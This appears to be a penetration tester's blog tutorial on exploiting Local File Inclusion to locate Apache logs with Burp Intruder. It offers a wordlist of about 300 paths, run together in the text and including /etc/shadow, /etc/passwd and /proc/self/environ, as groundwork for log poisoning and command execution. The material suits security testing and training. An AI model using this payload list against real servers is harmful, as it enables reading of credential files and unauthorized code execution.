Often when conducting security assessments it is necessary to go beyond just identifying the vulnerability, reporting it and heading out for a beer. Sometimes, like when conducting a penetration test or when asked by a client to demonstrate business risk, it is necessary to gain command line line access to the machine to show the risks associated with having a web user being able to execute commands on their machine. Often this involves getting a shell by some means but in the case of Local File Inclusion (LFI) simply finding the Apache Log location folder can be enough to start running commands on the system as the Apache service account.
Often I’ve wasted hours trying all sorts of combinations trying to find the correct location of the log files by looking up version numbers and identifying operating systems but being the true to the Pentesters code, sometimes it’s better to be lazy and just automate the damn thing. So what a buddy of mine and me did was to compile a list of common Apache log file locations and files that may indicate Apache log locations across different operating systems. This list is by no means comprehensive and if the developer or engineer has bothered to spend 5 minutes moving the log file locations then chances are that this list may not help you.
Luckily, most people don’t bother moving logs which makes this a great list to work with. Below is an example of how to use this list to quickly discover the location of the Apache log location after you’ve located a LFI vulnerability.
This tutorial will utilize Burp Suite, one of the better Web Testing suites available. If you don’t have a copy yet, go get it from http://www.portswigger.net/burp/ The paid version of the software does not have the timing restrictions and is well worth getting to speed up this attack.
To start, copy the contents of this list and save it somewhere you can access through Burp Suite.
|
001
002
003
004
005
006
007
008
009
010
011
012
013
014
015
016
017
018
019
020
021
022
023
024
025
026
027
028
029
030
031
032
033
034
035
036
037
038
039
040
041
042
043
044
045
046
047
048
049
050
051
052
053
054
055
056
057
058
059
060
061
062
063
064
065
066
067
068
069
070
071
072
073
074
075
076
077
078
079
080
081
082
083
084
085
086
087
088
089
090
091
092
093
094
095
096
097
098
099
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
|
/Library/WebServer/Documents/index.php/Library/WebServer/Documents/index.html/apache/logs/access.log/apache/logs/error.log/etc/GeoIP.conf.default/etc/PolicyKit/PolicyKit.conf/etc/X11/xorg.conf/etc/X11/xorg.conf-vesa/etc/X11/xorg.conf-vmware/etc/X11/xorg.conf.BeforeVMwareToolsInstall/etc/X11/xorg.conf.orig/etc/adduser.conf/etc/airoscript.conf/etc/apache2/apache2.conf/etc/apache2/conf.d/etc/apache2/conf.d/charset/etc/apache2/conf.d/security/etc/apache2/envvars/etc/apache2/httpd.conf/etc/apache2/mods-available/autoindex.conf/etc/apache2/mods-available/deflate.conf/etc/apache2/mods-available/dir.conf/etc/apache2/mods-available/mem_cache.conf/etc/apache2/mods-available/mime.conf/etc/apache2/mods-available/proxy.conf/etc/apache2/mods-available/setenvif.conf/etc/apache2/mods-available/ssl.conf/etc/apache2/mods-enabled/alias.conf/etc/apache2/mods-enabled/deflate.conf/etc/apache2/mods-enabled/dir.conf/etc/apache2/mods-enabled/mime.conf/etc/apache2/mods-enabled/negotiation.conf/etc/apache2/mods-enabled/php5.conf/etc/apache2/mods-enabled/status.conf/etc/apache2/ports.conf/etc/apache2/sites-available/default/etc/apache2/sites-enabled/000-default/etc/apt/apt.conf.d/etc/apt/apt.conf.d/00trustcdrom/etc/apt/apt.conf.d/01autoremove/etc/apt/apt.conf.d/01ubuntu/etc/apt/apt.conf.d/05aptitude/etc/apt/apt.conf.d/50unattended-upgrades/etc/apt/apt.conf.d/70debconf/etc/arpalert/arpalert.conf/etc/avahi/avahi-daemon.conf/etc/bash_completion.d/debconf/etc/belocs/locale-gen.conf/etc/bluetooth/input.conf/etc/bluetooth/main.conf/etc/bluetooth/network.conf/etc/bluetooth/rfcomm.conf/etc/bonobo-activation/bonobo-activation-config.xml/etc/ca-certificates.conf/etc/ca-certificates.conf.dpkg-old/etc/casper.conf/etc/chkrootkit.conf/etc/clamav/clamd.conf/etc/clamav/freshclam.conf/etc/conky/conky.conf/etc/console-tools/config.d/etc/console-tools/config.d/splashy/etc/cups/acroread.conf/etc/cups/cupsd.conf/etc/cups/cupsd.conf.default/etc/cups/pdftops.conf/etc/cups/printers.conf/etc/cvs-cron.conf/etc/cvs-pserver.conf/etc/dbus-1/session.conf/etc/dbus-1/system.conf/etc/debconf.conf/etc/defoma/config/etc/defoma/config/x-ttcidfont-conf.conf2/etc/deluser.conf/etc/depmod.d/ubuntu.conf/etc/dhcp3/dhclient.conf/etc/dhcp3/dhcpd.conf/etc/discover-modprobe.conf/etc/discover.conf.d/etc/discover.conf.d/00discover/etc/dns2tcpd.conf/etc/e2fsck.conf/etc/esound/esd.conf/etc/etter.conf/etc/fonts/conf.d/etc/fonts/conf.d/README/etc/foomatic/filter.conf/etc/foremost.conf/etc/freetds/freetds.conf/etc/fuse.conf/etc/gconf/etc/gconf/2/etc/gconf/2/evoldap.conf/etc/gconf/2/path/etc/gconf/gconf.xml.defaults/etc/gconf/gconf.xml.defaults/%gconf-tree.xml/etc/gconf/gconf.xml.mandatory/etc/gconf/gconf.xml.mandatory/%gconf-tree.xml/etc/gconf/gconf.xml.system/etc/gdm/failsafeDexconf/etc/gnome-vfs-2.0/modules/default-modules.conf/etc/gnome-vfs-2.0/modules/extra-modules.conf/etc/gre.d/1.9.0.10.system.conf/etc/gre.d/1.9.0.14.system.conf/etc/gre.d/1.9.0.15.system.conf/etc/group/etc/gtk-2.0/im-multipress.conf/etc/hdparm.conf/etc/host.conf/etc/htdig/htdig.conf/etc/httpd/conf/httpd.conf/etc/httpd/httpd.conf/etc/httpd/logs/acces.log/etc/httpd/logs/acces_log/etc/httpd/logs/access.log/etc/httpd/logs/access_log/etc/httpd/logs/error.log/etc/httpd/logs/error_log/etc/httpd/mod_php.conf/etc/inetd.conf/etc/initramfs-tools/conf.d/etc/irssi.conf/etc/java-6-sun/fontconfig.properties/etc/kbd/config/etc/kernel-img.conf/etc/kernel-pkg.conf/etc/ld.so.conf/etc/ldap/ldap.conf/etc/logrotate.conf/etc/ltrace.conf/etc/mail/sendmail.conf/etc/manpath.config/etc/menu-methods/menu.config/etc/miredo-server.conf/etc/miredo.conf/etc/miredo/miredo-server.conf/etc/miredo/miredo.conf/etc/modprobe.d/vmware-tools.conf/etc/mono/1.0/machine.config/etc/mono/2.0/machine.config/etc/mono/2.0/web.config/etc/mono/config/etc/mtools.conf/etc/mysql/conf.d/etc/mysql/conf.d/old_passwords.cnf/etc/nsswitch.conf/etc/oinkmaster.conf/etc/openvpn/update-resolv-conf/etc/pam.conf/etc/passwd/etc/pear/pear.conf/etc/php.ini/etc/php/php.ini/etc/php5/apache2/conf.d/etc/php5/apache2/php.ini/etc/php5/php.ini/etc/pm/config.d/etc/pm/config.d/00sleep_module/etc/postgresql-common/autovacuum.conf/etc/prelude/default/global.conf/etc/prelude/default/idmef-client.conf/etc/prelude/default/tls.conf/etc/privoxy/config/etc/proxychains.conf/etc/pulse/client.conf/etc/python/debian_config/etc/reader.conf/etc/reader.conf.d/etc/reader.conf.d/0comments/etc/reader.conf.d/libccidtwin/etc/reader.conf.old/etc/remastersys.conf/etc/resolv.conf/etc/resolvconf/etc/resolvconf/update-libc.d/etc/resolvconf/update-libc.d/sendmail/etc/rinetd.conf/etc/samba/dhcp.conf/etc/samba/smb.conf/etc/scrollkeeper.conf/etc/security/access.conf/etc/security/group.conf/etc/security/limits.conf/etc/security/namespace.conf/etc/security/opasswd/etc/security/pam_env.conf/etc/security/sepermit.conf/etc/security/time.conf/etc/sensors.conf/etc/shadow/etc/skel/.config/etc/skel/.config/Trolltech.conf/etc/skel/.config/codef00.com/etc/skel/.config/menus/etc/skel/.config/menus/applications-kmenuedit.menu/etc/skel/.config/user-dirs.dirs/etc/skel/.config/user-dirs.locale/etc/skel/.kde3/share/apps/kconf_update/etc/skel/.kde3/share/apps/kconf_update/log/update.log/etc/skel/.kde3/share/share/apps/kconf_update/etc/skel/.kde3/share/share/apps/kconf_update/log/etc/skel/.kde3/share/share/apps/kconf_update/log/update.log/etc/smi.conf/etc/snmp/snmpd.conf/etc/snort/reference.config/etc/snort/rules/emerging.conf/etc/snort/rules/open-test.conf/etc/snort/snort-mysql.conf/etc/snort/snort.conf/etc/snort/threshold.conf/etc/splashy/config.xml/etc/ssh/sshd_config/etc/stunnel/stunnel.conf/etc/subversion/config/etc/sysctl.conf/etc/sysctl.d/10-console-messages.conf/etc/sysctl.d/10-network-security.conf/etc/sysctl.d/10-process-security.conf/etc/sysctl.d/wine.sysctl.conf/etc/syslog.conf/etc/tinyproxy/tinyproxy.conf/etc/tor/tor-tsocks.conf/etc/tpvmlp.conf/etc/tsocks.conf/etc/ucf.conf/etc/udev/udev.conf/etc/ufw/sysctl.conf/etc/ufw/ufw.conf/etc/uniconf.conf/etc/unicornscan/modules.conf/etc/unicornscan/payloads.conf/etc/unicornscan/unicorn.conf/etc/updatedb.conf/etc/updatedb.conf.BeforeVMwareToolsInstall/etc/vmware-tools/config/etc/vmware-tools/tpvmlp.conf/etc/vmware-tools/vmware-tools-libraries.conf/etc/w3m/config/etc/wicd/dhclient.conf.template.default/etc/wicd/manager-settings.conf/etc/wicd/wired-settings.conf/etc/wicd/wireless-settings.conf/etc/xdg/user-dirs.conf/logs/access.log/logs/error.log/private/etc/apache2/extra/httpd-default.conf/private/etc/apache2/extra/httpd-userdir.conf/private/etc/apache2/extra/httpd-vhosts.conf/private/etc/apache2/mime.types/private/var/log/apache2/access_log/private/var/log/apache2/error_log/proc/cpuinfo/proc/meminfo/proc/self/cmdline/proc/self/environ/proc/self/mounts/proc/self/stat/proc/self/status/proc/version/share/snmp/snmpd.conf/srv/www/htdocs/index.html/usr/bin/php/php.ini/usr/bin/php5/bin/php.ini/usr/local/apache/logs/access.log/usr/local/apache/logs/access_log/usr/local/apache/logs/error.log/usr/local/apache/logs/error_log/usr/local/apache2/conf/extra/httpd-ssl.conf/usr/local/apache2/conf/httpd.conf/usr/local/apache2/logs/access_log/usr/local/apache2/logs/error_log/usr/local/etc/apache2/httpd.conf/usr/local/etc/apache22/httpd.conf/usr/local/www/apache22/data/index.html/usr/pkg/etc/httpd/httpd.conf/var/log/access.log/var/log/access_log/var/log/apache/access.log/var/log/apache/access_log/var/log/apache/error.log/var/log/apache/error_log/var/log/apache2/access.log/var/log/apache2/access_log/var/log/apache2/error.log/var/log/apache2/error_log/var/log/error.log/var/log/error_log/var/log/httpd-access.log/var/log/httpd-error.log/var/log/httpd/access.log/var/log/httpd/access_log/var/log/httpd/error.log/var/log/httpd/error_log/var/www/conf/httpd.conf/var/www/logs/access.log/var/www/logs/access_log/var/www/logs/error.log/var/www/logs/error_log/wwwroot/php/php.ini |
Once you have saved this list somewhere, open up Burp Suite, locate the LFI injection point and send the request to Burp Intruder.
In the Burp Intruder window, select the “Positions” tab and mark the position of your LFI injection point. Change the attack type to “Sniper”. Then under the “Payloads” tab, choose the Apache logs list or paste the contents of the list into the payload window.
Start the attack and pay attention to the length column. Typically Apache log folders are going to be large and should return a large length field.
When you find a length field that is significantly larger than the other requests, look at the response to see if the contents returned match what an Apache log file would look like. If it does look like a log file and you can see some of your previous traffic displayed, you have successfully found the Apache log location and can now use this to start injecting your PHP code to run requests on the target machine.
I will outline the steps to complete this in the next post.
Footnote: this log list is not comprehensive and I will continue to add to it as I find more more locations as well as some windows folder locations.